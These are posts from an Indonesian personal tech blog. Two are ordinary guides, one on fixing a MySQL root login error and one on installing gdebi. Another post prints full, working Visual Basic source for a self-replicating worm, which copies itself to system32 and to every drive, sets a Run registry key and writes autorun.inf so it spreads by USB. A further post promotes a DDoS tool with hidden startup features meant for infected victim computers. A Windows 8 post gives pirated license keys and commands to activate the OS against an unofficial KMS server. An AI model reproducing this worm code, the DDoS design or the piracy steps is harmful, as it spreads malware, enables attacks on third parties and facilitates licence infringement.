Tampilkan postingan dengan label Software. Tampilkan semua postingan
Tampilkan postingan dengan label Software. Tampilkan semua postingan

Jumat, 28 November 2014

How to Fix ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)

This Articels is about Fix Problem connecting Mysql.

Relate search : ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)

Pertanyaan :  I've been install mysql in my linux operating system, but when I run, its going error. how can I fix it?

Mysql adalah salah satu DBMS yang paling banyak di gunakan, baik itu untuk lingkungan Desktop , mobile ataupun WEB, di lingkungan web database mysql adalah DBMS yang paling banyak di gunakan, Query-Query yang ada di mysql tidak semuanya berbeda, sebagian besar query yang di gunakan sama seperti DBMS yang lain. PHPmyadmin adalah aplication database yang di gunakan untuk mengatur mysql dengan GUI version.

Mysql bersifat multiplatform, jadi dapat di gunakan untuk banyak operating system dan bahasa pemrograman, pada tips and trick kali ini, saya akan membahas tentang problem yang terjadi saat kita menjalankan mysql via terminal di linux. berikut error yang muncul : 

ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)


sudah beberapa hari saya mendapatkan error ini, tapi saya hiraukan karna masih belom penting, tapi kemaren waktu praktikum database, akhirnya di butuhkan juga. dan saya terpaksa untuk mencoba memperbaikinya, dapet satu jam googling akhirnya dapet juga dari website stackoverflow, ada yang bertanya dan ada yang jawab juga, saya coba satu-satu akhirnya dapet satu yang berhasil :D  berikut saya praktekkan cara memperbaikinya :

1. Masuk ke user root : ketik $ sudo su 
2. setelah masuk user root, sekarang ketik # mysql -u root -p
  • apabila terdapat error > ERROR 2002 (HY000) : Can't connect to local Mysql server bla bla bla : itu berarti mysql anda masih belum berjalan. untuk menjalankan nya ketik : # service mysql start
  • apabila terdapat error > ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO) : itu berarti error karna password atau user yang kita masukkan salah.
3. berikut adalah tampilan jejak beberapa langkah di atas : 

  • setelah itu ketik : # dpkg-reconfigure mysql-server-5.5


4. Setelah perintah di atas di jalankan, maka akan keluar tampilan seperti berikut di terminal anda. terdapat perintah untuk mengisikan password baru untuk user root , isikan password sesuai yang anda inginkan. setelah itu tekan arah bawah di keyboard untuk masuk ke tombol <ok>, lalu [enter].


5. ketikkan password yang sama seperti yang awal tadi, lalu pilih <ok>




6. tunggu proccess pemberhentian mysql service sampai selesai.



 7. jalankan mysql : ketik # service mysql start



8. dan akhirnya kita akan ke tahap untuk masuk mysql : ketik # mysql -u root -p  lalu enter > ketikkan password baru anda, lalu enter lagi. apabila berhasil maka anda akan masuk ke lingkungan mysql DBMS seperti gambar di bawah. Conratulation !!! :)



Mau pasang iklan di blog?. klik Disini

Sekian artikel saya, Semoga Bermanfaat. Wassalamualaikum Wr Wb

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.

Install Paket Debian dengan Gdebi

This tutorial is about Gdebi package. relate search : Gdebi, Debian Package, Terminal, Problem, Linux, Ubuntu, dpkg -i, *.deb , install.

Gdebi adalah software installer paket *.deb berupa GUI (Graphic User Interface),  yang di gunakan untuk menginstall paket debian secara GUI. selama ini kita ketahui, kalau ingin install paket debian menggunakan cara , mengetik perintah di Terminal " ~#dpkg -i *.deb " , hal tersebut terkadang membingungkan bagi pengguna linux pemula, karna bukan hanya harus mengetik perintah di atas, tetapi juga terlebih dahulu harus masuk ke direktori file yang mau di install. tahap-tahap tersebut sekarang dapat di persingkat dengan menggunakan software GDEBI.

Berikut tutorial cara menggunakannya :

1. Download terlebih dahulu Softwarenya di terminal :




2. Ketik "Y" dua kali. untuk menyetujui menginstall GDEBI, apabila tidak ada peringatan seperti berikut, jangan panik! persetujuan ini tidak selalu muncul.


3. Apabila sukses maka hasilnya seperti ini : 



4. Setelah selesai Install GDEBI, sekarang kita lanjut untuk praktek menginstall paket debian menggunakan GDEBI. 
 * ada dua opsi untuk pertama kali install : 
a. masuk ke direktori file deb - > klik kanan pada file deb- > pilih open with - > other application
b. masuk ke direktori file deb - > klik kanan pada file deb- > pilih install with gdebi


5. klik select maka akan muncul jendela berikut : 



Setelah itu klik Install Package, lalu tunggu sampai instalasi selesai.



Mau pasang iklan di blog?. klik Disini

Sekian artikel saya, Semoga Bermanfaat. Wassalamualaikum Wr Wb

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.

Minggu, 19 Januari 2014

Membuat Worm Sederhana dari Visual Basic 6.0



alhamdulillah, satu lagi project yang slesai malam ini. :) berikut adalah project kedua ku, yaitu Worm sederhana.

apa itu worm? google ya? :D hehe

worm ini di buat dari bahasa Basic dengan IDE visual basic 6.0 , worm ini tidak memiliki tujuan jahat. dan hanya bertujuan untuk membuatnya hidup terus dengan menggandakan dirinya ke USB dan PC.

berikut scriptnya :

'Nama       : Bill Tanthowi Jauhari
'tanggal    : 9, januari 2014
'project    : worm
'referensi  : www.google.com , ebook

Dim Nama, direktory As String
'mendapatkan direktory worm
Function tempat()
On Error Resume Next
Dim direktory As String
Nama = App.EXEName & ".exe"
direktory = App.Path
If Right(direktory, 1) <> "\" Then
direktory = direktory & "\"
End If
tempat = direktory & Nama
End Function
'menanam word di registry windows
Function tanam()
On Error Resume Next
Nama = App.EXEName & ".exe"
Shell ("REG ADD HKCU\software\microsoft\windows\currentversion\run /t REG_SZ /v " & Nama & " /d C:\Windows\system32\" & Nama & " /f")
End Function
'mengcopy worm ke semua drive
Function kopi()
On Error Resume Next
Dim filename, direk As String
Dim ulang(6) As String
ulang(1) = "C"
ulang(2) = "D"
ulang(3) = "E"
ulang(4) = "F"
ulang(5) = "G"
ulang(6) = "H"
Nama = App.EXEName & ".exe"
direktory = "C:\windows\system32\"
filename = direktory & Nama
FileCopy tempat, filename
For i = 1 To 6
direk = ulang(i) & ":\"
If Len(Dir(direk)) <> 0 Then
FileCopy tempat, ulang(i) & ":\" & Nama
End If
Next i

End Function
'pengecekan apakah worm masih ada di PC
Function pengecekan()
On Error Resume Next
Dim ulang(6), hasil As String
ulang(1) = "C"
ulang(2) = "D"
ulang(3) = "E"
ulang(4) = "F"
ulang(5) = "G"
ulang(6) = "H"
Nama = App.EXEName & ".exe"
direktory = "C:\windows\system32\"
hasil = direktory & Nama
If Len(Dir(hasil)) = 0 Then
kopi
tanam
End If
For i = 1 To 6
If Len(Dir(ulang(i) & ":\" & Nama)) = 0 Then
kopi
End If
Next i
End Function
'membuat file autorun.inf ke semua drive
Function jalan()
On Error Resume Next
Dim namatext As String
Dim ulang(6) As String
ulang(1) = "C"
ulang(2) = "D"
ulang(3) = "E"
ulang(4) = "F"
ulang(5) = "G"
ulang(6) = "H"
Nama = App.EXEName & ".exe"
For i = 1 To 6
namatext = ulang(i) & ":\autorun.inf"
If Len(Dir(namatext)) = 0 Then
Open namatext For Output As #1
Print #1, "[autorun]"
Print #1, "Open=" & Nama
Close #1
End If
Next i
End Function
'fungsi eksekusi
Private Sub Form_Load()
On Error GoTo rusak
kopi
tanam
jalan
pengecekan
Exit Sub
rusak:
Unload Me
End Sub
'timer untuk menjalankan worm
Private Sub Timer1_Timer()
On Error Resume Next
pengecekan
End Sub

apabila ingin mengembangkan lagi, silahkan download filenya di : WORM

WARNING : di mohon untuk teman-teman agar tidak mengcopy ulang link di atas. penulis mencoba untuk mempertahankan agar link tetap hidup dan dapat terus di gunakan oleh pengunjung yang tertarik untuk mendownloadnya. 

Kamis, 09 Januari 2014

Membuat Software DDOS dengan VB 6.0

alhamdulillah, akhirnya liburan telah datang. project-project yang udah aku rancang waktu di sela-sela kesibukan kuliah pun akhirnya bisa di kerjakan sekarang. beberapa project udah aku kerjakan dan salah satunya sudah selesai. berikut adalah software yang telah aku slesaikan. namanya belum aku berikan :D hehehe, tapi fungsinya adalah sebagai alat untuk melakukan DDOS attack. apa itu DDOS attack atau bisa di sebut stress testing?.
In computing, a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet. As clarification, DDoS{Distributed Denial of Service} attacks are sent by two or more persons, or bots. (See botnet) DoS (Denial of Service) attacks are sent by one person or system.
Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. This technique has now seen extensive use in certain games, used by server owners, or disgruntled competitors on games. Increasingly, DoS attacks have also been used as a form of resistance. Richard Stallman has stated that DoS is a form of 'Internet Street Protests’.[1]The term is generally used relating to computer networks, but is not limited to this field; for example, it is also used in reference to CPU resource management.[2]
One common method of attack involves saturating the target machine with external communications requests, so much so that it cannot respond to legitimate traffic, or responds so slowly as to be rendered essentially unavailable. Such attacks usually lead to a server overload. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, or consuming its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.
Denial-of-service attacks are considered violations of the Internet Architecture Board's Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers. They also commonly constitute violations of the laws of individual nations.

sumber  : wikipedia

tanpa lama-lama lagi ini dia deskripsi dari software ku.


software DDOS attack di buat menggunakan bahasa basic dengan IDE visual basic 6.0 , software ini berfungsi untuk membanjiri trafic website atau menghabiskan daya internet yang ada di area lan. softaware ini memiliki beberapa fitur, yaitu launch at startup dan hide software, keduanya memiliki fungsi yang memungkinkan untuk mendukung penyerangan DDOS.

+ launch at startup : di gunakan untuk membuat software ini berjalan saat startup, fungsi ini di gunakan saat hacker menginginkan untuk menginfeksi komputer orang lain atau warnet dapat melakukan serangan DDOS attack secara otomatis walaupun tidak di kontrol.


+ hide software : berfungsi untuk menyembunyikan form software saat software berjalan. fitur ini di gunakan apabila hacker telah menginfeksi komputer orang lain, jadi software ini akan melakukan DDOS dengan otomatis tanpa di ketahui oleh pengguna lain saat menggunakann komputer korban.



+change color : hanya untuk mengganti warna form hehehehe :D

apabila pembaca ingin mengembangkan atau mengetahui script dari software ini bisa di download file nya di sini.

Sekian artikel dari saya tentang membuat software DDOS dengan VB 6.0. terimakasih telah membaca semoga bermanfaat. :)

NB : artikel ini bertujuan untuk menambah wawasan pembaca tentang bagaimana membuat software DDOS dengan VB 6.0, untuk segala tindakan kriminal yang dilakukan oleh pembaca dari artikel ini. penulis tidak bertanggung jawab.

Senin, 13 Mei 2013

Kill Autorun.inf dengan AUTORUNKILLER V1.1

hallo pecinta blogger.. dan pengunjung setia diamanapuna anda berada. bagaimana kabarnya? 
semoga anda baik baik saja disana, kabar baik untuk yang selalu di limbung susah karena virus autorun.inf. sudah taukan virus autorun.inf, pasti nyebelinkan?. yah, nih virus benar2 membuat pusing dengan cara penggandaanya yangselalu terdeteksi antivirus, tapi gak mau hilang2.waaahhhh. gimana itu..!!??

tapi tenang saja semua pahlawan kan datangnya terakhir, dah karna anda sudah berjuang mencari bagaimana cara menghapusnya. ini saya kasih jawabannya, yaitu KILL AUTORUN DENGAN AUTORUNKILLER V1.1 . dah software ini adalah sequel dari  AUTORUNKILLER V1.0 yang minggu kemarin sudah aku share di postingan lain. kalo mau tau bagaimana AUTORUNKILLER V1.0 klik disini.
tapi bagi yang ingin versi terbarunya silahkan lihat download di postingan ini. karna yang terbaru ini lebih mudah penggunaannya dan lebih banyak virusnya. eh maksud ku fiturnya hehehehe
AUTORUNKILLER V1.1 memiliki fitur sebagai berikut 
1. scaning : fitur ini memudahkan user untuk menemukan virus autorun.inf yang terdapat di berbagai drive termasuk drive USB.
2. autorun protecting : fitur ini membuat user di beri kesempatan untuk memproteksi drive dari penyebaran virus autorun.inf
3. autorun modify : dalam fitur ini terdapat fitur lagi yaitu :
a. autorun killer
b. autorun injector
c. autorun bomber
d. autorun capturing
semua fitur itu adalah fitur yang berfungsi untuk mengeksekusi virus autorun.inf sesuai keinginan USER.
4. open : untuk membuka file autorun.inf
wah gimana? hebatkan software buatan ku. hahaha untuk yang pingin download silahkan klik disini
itu semua adalah software yang di bangun dari batch programing dan pascal programing. untuk yang ingin tau scriptnya silahkan scroll terus kebawah :


PASCAL PROGRAMING :


PROGRAM AUTORUNKILLER;

uses crt;
label start,answer;
var
trojan:text; s:char;              pilihan,I,J,k,l:integer;
DRIVE,nama2,NAMA:string;
begin clrscr;
writeln('###############################################');
writeln('  P R O G R A M   A U T O R U N   M O D I F Y  ');
writeln('###############################################');

wrITELN;
WRITELN;
start :
WRITELN;
WRITELN('[1] AUTORUN INJECKTOR ');
WRITELN('[2] AUTORUN KILLER ');
WRITELN('[3] AUTORUN MAKER ');
WRITELN('[4] AUTORUN BOMBER ');
writeln('[5] AUTORUN CAPTURING ');
writeln('[6] GOTO MAIN MENU ');
writeln;
WRITE('MASUKKAN PILIHAN ANDA ==> '); READLN(PILIHAN);
 writeln;
 writeln('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%');
 writeln ;
case pilihan of
1:              begin
write('INSERT THE DRIVE             =>  ');READLN(DRIVE);
write('PLEASE INSERT YOUR NAME HERE =>  ');READLN(NAMA);
assign(trojan,DRIVE+':\autorun.inf');
rewrite(trojan);
WRITELN(TROJAN,' ');
writeln(trojan,'THIS AUTORUN FILE WAS INJECTED BY '+NAMA);
writeln(TROJAN,' ');
writeln(trojan,'****************************************************');
writeln(trojan,'|            ..::GATES JUNIOR WAS HERE::..         |');
WRITELN(trojan,'|      PLEASE FOLLOW MY TWITTER : @JAUCERO_HARI    |');
writeln(trojan,'****************************************************');
close(trojan);
           goto answer; end;
2 :
begin
write('INSERT THE DRIVE             =>  ');READLN(DRIVE);
assign(trojan, DRIVE+':\autorun.inf');
rewrite(trojan);
close(trojan);
goto answer; end;
3 :
begin
write('INSERT THE DRIVE                    =>  ');READLN(DRIVE);
write('TYPE YOUR *.EXE FILE, TO BE AUTORUN =>  ');readln(nama2);
ASSIGN(TROJAN, DRIVE+':\autorun.inf');
rewrite(trojan);
writeln(trojan,'[autorun]');
writeln(trojan,'open='+nama2);
close(trojan);
goto answer;
end;
4:
begin
write('INSERT THE DRIVE             =>  ');READLN(DRIVE);
assign(trojan, DRIVE+':\autorun.inf');
rewrite(trojan);
write('INSERT NUMBER BOMB           =>  ');READLN(I);
for k:= 1 to I do begin
writeln(trojan);
for j:=1 to I do
begin
write(trojan, j);
end;
end;
close(trojan);
 goto answer;
END;
5 :
begin
write('INSERT THE DRIVE             =>  ');READLN(DRIVE);
assign(trojan, DRIVE+':\autorun.inf');
reset(trojan);
readln(trojan, nama2);
readln(trojan, NAMA);
writeln(nama2);
writeln(NAMA);
close(trojan);
readln;
 GOTO answer;
end;
6 :
exit;
else                                         BEGIN
writeln('PLEASE INSERT THE CORRECT NUMBER ');
goto answer;
end;
answer :     begin
writeln('PROCCES DONE');
writeln;
writeln('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%');
GOTO START;       end;
end;
 end.



BATCH PROGRAMING :


@echo off
set "kill=autorunkiller.exe"
if exist %kill% (
goto siap )
else (
goto peringatan2 )
:siap
set "kill2=Master.exe"
if exist %kill% (
goto awal1
) else (
goto peringatan )
:awal1
CLS
TITLE A U T O R U N
ECHO HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
ECHO ---------------------------------------------------
ECHO            A U T O R U N   K I L L E R
ECHO ---------------------------------------------------
ECHO HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
:Awal
color cf
echo ___________________________________________________
echo ---------------------------------------------------
echo [1] SCAN AUTORUN
echo [2] PROTECT MY PC FROM AUTORUN
echo [3] AUTORUN MODIFY
echo [4] OPEN AUTORUN FILE
echo [5] EXIT
echo [6] ABOUT
set /p "SCAN=MASUKKAN PILIHAN ANDA : "
if %scan%==1 (
GOTO SCANING )
if %scan%==2 (
goto protect )
if %scan%==3 (
goto execute )
if %scan%==4 (
goto open    )
if %scan%==5 (
goto exit    )
if %scan%==6 (
goto about   )

:execute
color 0B
%kill2%
goto awal
:scaning
echo ___________________________________________________
echo ---------------------------------------------------
echo Scaning file autorun.inf . . .
set "tmp=%%a:\autorun.inf"
for %%a in (C D E F G H I J) do (
attrib +a -r -s -h %tmp%
if exist %tmp% (
msg * DRIVE %%a  TERJANGKIT AUTORUN )
if not exist %tmp% (
echo TIDAK DITEMUKAN AUTORUN PADA DRIVE %%a )
)
echo scaning selesai
goto awal


:protect
echo ___________________________________________________
echo ---------------------------------------------------
echo DRAG AND DROP DRIVE YANG AKAN ANDA PROTEKSI
echo ATAU KETIK NAMA DRIVE ANDA CONTOH "D"/"C"
set /p "HD= DRIVE -->  "
set "auto=%HD%:\autorun.inf"
attrib +a -r -s -h %auto%
if exist %auto% (
del %auto
mkdir %auto%
attrib -a +s +r +h %auto%
echo PROTECTING FINISH . . .
MSG * YOUR DRIVE IS SECURE
pause
goto awal )
:open
echo ___________________________________________________
echo ---------------------------------------------------
echo MASUKKAN DRIVE YANG TERJANGKIT FILE AUTORUN
echo ATAU KETIK NAMA DRIVE ANDA CONTOH "D"/"C"
set /p "dd=DRIVE -->  "
%dd%:/autorun.inf
ECHO FILE HAS OPENED
pause
goto awal
:about
cls
echo *****************************************
echo -----------------------------------------
echo AUTHOR    : BILL TANTHOWI JAUHARI
ECHO -----------------------------------------
ECHO FACEBOOK  : BILL TANTHOWI JAUHARI
ECHO -----------------------------------------
ECHO TWITTER   : @JAUCERO_HARI
ECHO -----------------------------------------
ECHO AUTORUN KILLER CREATE AT 26-04-2013
ECHO -----------------------------------------
ECHO *****************************************
ECHO (^..^)     TV RUSAK !!!!!!!!!!!!!!  (^..^)
ECHO       TEKAN CTRL+C UNTUK KELUAR
:AWAL1
color 0A
COLOR 8F
GOTO AWAL1

:peringatan
msg * FILE MASTER TELAH HILANG ATAU BERGANTI NAMA, TOLONG PERBAIKI KEMBALI
goto exit
:peringatan2
msg * FILE AUTORUNKILLER TELAH HILANG ATAU BERGANTI NAMA, TOLONG PERBAIKI KEMBALI
GOTO exit
:exit
MSG * THANK YOU FOR USING
exit

Rabu, 08 Mei 2013

Kill Autorun.inf dengan AUTORUNKILLER V1.0

AUTORUN KILLER

ASSALAMUALAIKUM WR.WB
Berikut saya akan share ke semua sahabat blogger, ini adalah software buatan saya. Yang namanya AUTORUN KILLER,  sebelum menginjak ke kelebihan dan kekurangan software ini. Saya akan memberitahu  anda tentang ciri-ciri software ini.
AUTORUN KILLER adalah software  berbasi DOS / Text . di bangun dari script batch programing dan pascal programing, dan compilernya adalah freepascal untuk pascal programing dan batch converter untuk batch script. Software ini terdiri dari 2 file,yaitu file autorunkiller.exe dan file master.exe .
Untuk kelebihan dari software ini adalah anda akan di beri kemudahan untuk memperlakukan file autorun.inf yang sering dan mayoritas di gunakan oleh virus-virus untuk penyebarannya. Nah apabila file autorun.inf sudah di eksekusi alias di kil. Otomatis file induk virus tidak akan berkutik karna file penggeraknya sudah tidak bisa bekerja. Software ini sangat ringan, yah kalau itu sudah cirikhas dari software berbasis DOS. Ukurannya tidak sampai 1 MB tapi minta ampun scriptnya.
-   Software autorunkiller ini hamper seperti antivirus tetapi hanya berfungsi ke file autorun.inf
-  Software autorunkiller ini akan memberikan anda beberapa option untuk memperlakukan file autorun seperti :
o    Autorun injecktor
o    Autorun killer
o    Membuka file autorun
o    Proteksi dari file autorun.inf
o    dll
Untuk kekurangan dalam AUTORUN KILLER sebagai berikut :
-    Terlalu banyak perintah masukkan (maklumlah, namanya aja DOS)
-    Masih terbatas kepada drive C: D: E: (untuk drive lain masih dalam pengembangan )
-    Masih bisa terjadi runtime error dalam eksekusinya

Berikut adalah tampilan dari software AUTORUN KILLER :




Untuk yang ingin tahu sciptnya berikut saya berikan sciptnya baik dari pascal programing ataupun batch programing :


SCRIPT BATCH PROGRAMING

@echo off
SET /p "MASTER1=DRAG AND DROP FILE Master.exe DI SINI ==> "
set "kill=autorunkiller.exe"
if exist %kill% (
goto siap )
else (
goto peringatan2 )
:siap
set "kill=Master.exe"
if exist %kill% (
goto awal
) else (
goto peringatan )

:Awal
CLS
TITLE A U T O R U N
color cf
ECHO HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
ECHO ---------------------------------------------------
ECHO            A U T O R U N   K I L L E R
ECHO ---------------------------------------------------
ECHO HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
echo [1] SCAN AUTORUN
echo [2] PROTECT MY PC FROM AUTORUN
echo [3] AUTORUN MODIFY
echo [4] OPEN AUTORUN FILE
echo [5] EXIT
echo [6] ABOUT
set /p "SCAN=MASUKKAN PILIHAN ANDA : "
if %scan%==1 (
GOTO SCANING )
if %scan%==2 (
goto protect )
if %scan%==3 (
goto execute )
if %scan%==4 (
goto open    )
if %scan%==5 (
goto exit    )
if %scan%==6 (
goto about   )
:hasil
ECHO SCANING COMPLETE . .
pause

GOTO AWAL
:execute
color AF
%master1%
ECHO GOTO MAIN MENU
pause
goto awal
:scaning
echo Scaning file autorun.inf . . .
goto if
:message
msg * AUTORUN.INF TIDAK DI TEMUKAN DI DRIVE C:\
goto if2
:message2
msg * AUTORUN.INF TIDAK DI TEMUKAN DI DRIVE D:\
goto if3
:message3
msg * AUTORUN.INF TIDAK DI TEMUKAN DI DRIVE E:\
goto HASIL

:if
cd /d c:\
attrib +a -r -s -h autorun.inf
set "autorun=autorun.inf"
if exist %autorun% (
echo FILE AUTORUN DI TEMUKAN
MSG * TERDAPAT FILE AUTORUN DALAM DRIVE C:\
goto if2
) else (
goto message )

:if2
cd /d d:\
attrib +a -r -s -h autorun.inf
set "autorun=autorun.inf"
if exist %autorun% (
echo FILE AUTORUN DI TEMUKAN
MSG * TERDAPAT FILE AUTORUN DALAM DRIVE D:\
goto if3
) else (
goto message2 )

:if3
cd /d E:\
attrib +a -r -s -h autorun.inf
set "autorun=autorun.inf"
if exist %autorun% (
MSG * TERDAPAT FILE AUTORUN DALAM DRIVE E:\
goto hasil
) else (
goto message3 )

:protect
echo DRAG AND DROP DRIVE YANG AKAN ANDA PROTEKSI
set /p "HD= DI SINI "
cd /d %HD%
set "auto=autorun.inf"
if exist %auto% (
attrib +a -r -s -h autorun.inf
del autorun.inf
mkdir \autorun.inf
attrib -a +s +r +h autorun.inf
echo PROTECTING FINISH . . .
MSG * YOUR DRIVE IS SECURE
pause
goto awal )
:open
echo MASUKKAN DRIVE YANG TERJANGKIT FILE AUTORUN
set /p "DD=DI SINI "
cd /d %dd%
attrib +a -r -s -h autorun.inf
autorun.inf

goto awal
:about
cls
echo *****************************************
echo -----------------------------------------
echo AUTHOR    : BILL TANTHOWI JAUHARI
ECHO -----------------------------------------
ECHO FACEBOOK  : BILL TANTHOWI JAUHARI
ECHO -----------------------------------------
ECHO TWITTER   : @JAUCERO_HARI
ECHO -----------------------------------------
ECHO AUTORUN KILLER CREATE AT 26-04-2013
ECHO -----------------------------------------
ECHO *****************************************
ECHO (^..^)     TV RUSAK !!!!!!!!!!!!!!  (^..^)
ECHO       TEKAN CTRL+C UNTUK KELUAR
:AWAL1
color 0A
COLOR 8F
GOTO AWAL1

:peringatan
msg * FILE MASTER TELAH HILANG ATAU BERGANTI NAMA, TOLONG PERBAIKI KEMBALI
goto exit
:peringatan2
msg * FILE AUTORUNKILLER TELAH HILANG ATAU BERGANTI NAMA, TOLONG PERBAIKI KEMBALI
GOTO exit
:exit
MSG * THANK YOU FOR USING
exit



SCRIPT PASCAL PROGRAMING


uses crt;
label start,answer;
var
trojan:text; s:char;              pilihan:integer;
nama2,NAMA:string;
begin clrscr;
writeln('###############################################');
writeln('  P R O G R A M   A U T O R U N   M O D I F Y  ');
writeln('###############################################');

wrITELN;
WRITELN;
start :
WRITELN('[1] AUTORUN INJECKTOR ');
WRITELN('[2] AUTORUN KILLER ');
WRITELN('[3] AUTORUN MAKER ');
writeln('[4] GOTO MAIN MENU ');
writeln;
WRITE('MASUKKAN PILIHAN ANDA ==> '); READLN(PILIHAN);
case pilihan of
1:              begin
writeln('PLEASE INSERT YOUR NAME HERE ==>  ');READLN(NAMA);
for s:= 'C' to 'E' do begin
assign(trojan,s+':\autorun.inf');
rewrite(trojan);
WRITELN(TROJAN,' ');
writeln(trojan,'THIS AUTORUN FILE WAS INJECTED BY '+NAMA);
writeln(TROJAN,' ');
writeln(trojan,'****************************************************');
writeln(trojan,'|            ..::GATES JUNIOR WAS HERE::..         |');
WRITELN(trojan,'|      PLEASE FOLLOW MY TWITTER : @JAUCERO_HARI    |');
writeln(trojan,'****************************************************');
close(trojan);
       end;     goto answer; end;
2 :
begin
for s:= 'C' to 'E' do begin
assign(trojan,s+':\autorun.inf');
rewrite(trojan);
close(trojan);
end; goto answer; end;
3 :
begin
WRITELN('TYPE YOUR DRIVE OR DRAG AND DROP YOUR DIRECTORY HERE ==>  ');READLN(NAMA);
writeln('TYPE YOUR *.EXE FILE, TO BE AUTORUN ==>  ');readln(nama2);
ASSIGN(TROJAN, NAMA+'autorun.inf');
rewrite(trojan);
writeln(trojan,'[autorun]');
writeln(trojan,'open='+nama2);
close(trojan);
goto answer;
end;
4 :
exit;
else                                         BEGIN
writeln('PLEASE INSERT THE CORRECT NUMBER ');
goto answer;
end;
answer :     begin
writeln('PROCCES DONE');  READLN;
GOTO START;       end;
end;
 end.







Untuk yang tertarik dengan software saya silahkan download disini (saya sertakan scriptnya juga)


SEMOGA BERMANFAAT . DAN SELAMAT MEMBASMI AUTORUN.INF
Wassalamualaikum wr. wb

Jumat, 14 Desember 2012

Windows 8 Profesional Download And Priview

hallo semua . .
baru selesai ujian akhir semester nih , jadi maaf untuk seminggu kemaren saya gak bisa share di blog. maklumlah masa belajar SKS(sistem kebut semalam) :D.
akhir semester kemaren saya mencoba beberapa eksperiment, sebetulnya bukan eksperiment. nih cuma sekedar coba-coba. saya menginstal windows 8 release priview.
waw hanya selang beberapa minggu setelah windows 8 release, sudah banyak directlink yang memberikan windows 8 baik release priview atau profesional dengan gratis. waw

dengan adanya postingan ini saya mau berbagi pengalaman mengenai windows 8 bagi yang belum ngerasain manufer dari system windows 8. menurut saya OS ini lebih cenderung ke komputer tablet,
karna applikasi dan tampilannya sangat mendukung sekali buat komputer tablet. walaupunversi PC nya ada tetapi OS ini lebih pantas kalau di taruh di komputer tablet.

untuk mengetahuinya , agar gak penasaran silahkan lihat shortcut-shortcut berikut.

1. berikut adalah shortcut dari start menu windows 8 yang menjadi pembeda paling menonjol dari versi windows sebelumnya.


2. ini adalah tampilan menu photo viewer dari windows 8


3. dalam windows 8 terdapat applikasi pemutar music dan video selain windows media player, berikut shorcutnya.


4. windows explorer dalam windows 8 menyediakan menu-menu yang lebih dinamis, dan tool bar yang interaktif.



5. apabila kalian arahkan kursor ke atas desktop, kursor akan berubah menjadi tangan, pada saat itu klik dan tahan , lalu tarik. dan akan menjadikan tampilan desktop sperti gambar berikut.


6. satu lagi yang menarik pada desktop, apabila kalian mengarahkan kursor ke arah pojok kanan atas/bawah, kalian akan menemukan menu lain yang di tunjukkan pada shortcut berikut.


7. saat kalian menggunakan applikasi yang ada pada start menu, kalian gak akan menemukan menu clos untuk menutup applikasi, kalian harus kembali ke desktop, dan arahkan kursor ke pojok kiri atas untuk menemukan applikasi lalu klik kanan-> close. seperti pada shorcut berikut


8. beberapa icon tray seperti icon tray dari WI-FI, pada windows 8 menunya berubah, menjadi seperti shorcut berikut, dan di tambah menu airplane mode.


9. windows 8 memberikan menu custom bagi user yang bosan denga tampilan start menu yang sama setiap booting. menu custom tersebut bermaksutkan memberikan kebebasan user untuk mengganti background warna, gambar, dan foto profil. seperti pada shortcut berikut.




10. tak selesai di situ, windows 8 sangat memanjakan user yang suka typing dan emotion. pada windows 8 terdapat virtual keyboard yang dinamis, di tambah emotion yang menarik dan lucu.


apabila kalian ingin merasakan bagaimana rasanya windows 8 secara realis. kalian bisa  download instaler dan aktivatornya di link berikut. . :

 Windows 8 32 bit
 Windows 8 64 bit


Licensi key :
  • XKY4K-2NRWR-8F6P2-448RF-CRYQH
  • NG4HW-VH26C-733KW-K6F98-J8CK4
  • RR3BN-3YY9P-9D7FC-7J4YF-QGJXW
Cara Menjadikan Windows 8 Pro Genuine (How to patch Windows 8 Pro):
  1. Klik kanan di START, pilih Command Prompt (ADMIN).
  2. Ketik slmgr.vbs -ipk NG4HW-VH26C-733KW-K6F98-J8CK4, lalu enter.
  3. Ketik lagi slmgr.vbs -skms kms.dant.net.ru, enter.
  4. ketik lagi slmgr.vbs -ato .Enter. Lalu restart PC anda.
  5. Selamat, Windows 8 Pro Anda sudah Genuine atau Full Version.
link di atas saya dapatkan dari Sumber ini

Rabu, 21 November 2012

Cara Download Cepat (MP3,Video,Image,Ebook,dll) menggunakan Add Ons Flashgot

hai semua. . .
sekarang saya mau memberikan sedikit trik yang mudah tapi sangat berguna untuk kalian yang suka download. 
apakah kalian suka download?? pasti iya kan.  hehehe
apakah kalian tau Internet download manager?? pasti iya kan.!
apakah kalian sering menggunakan internet download manager?? selalu. .  hehehe

nah karna Internetdownloadmanager(IDM) itu berbayar, apakah kalian bisa maksimal menggunakannya? atau apakah kalian bisa nyaman apabila selalu di bayang-banyangi hari-hari menghitung waktu mundur dalam masa trial IDM, huaha . . pasti gak enak kan?? atau kalian menggunakan crack IDM? tentu itu membantu, tetapi hal itu gak terlalu efficien, karna IDM selalu update tiap bulannya. hal itu membuat crack yang telah berhasil di versi lama tidak berguna di versi yang baru. . adduuuhh payah dah IDM.

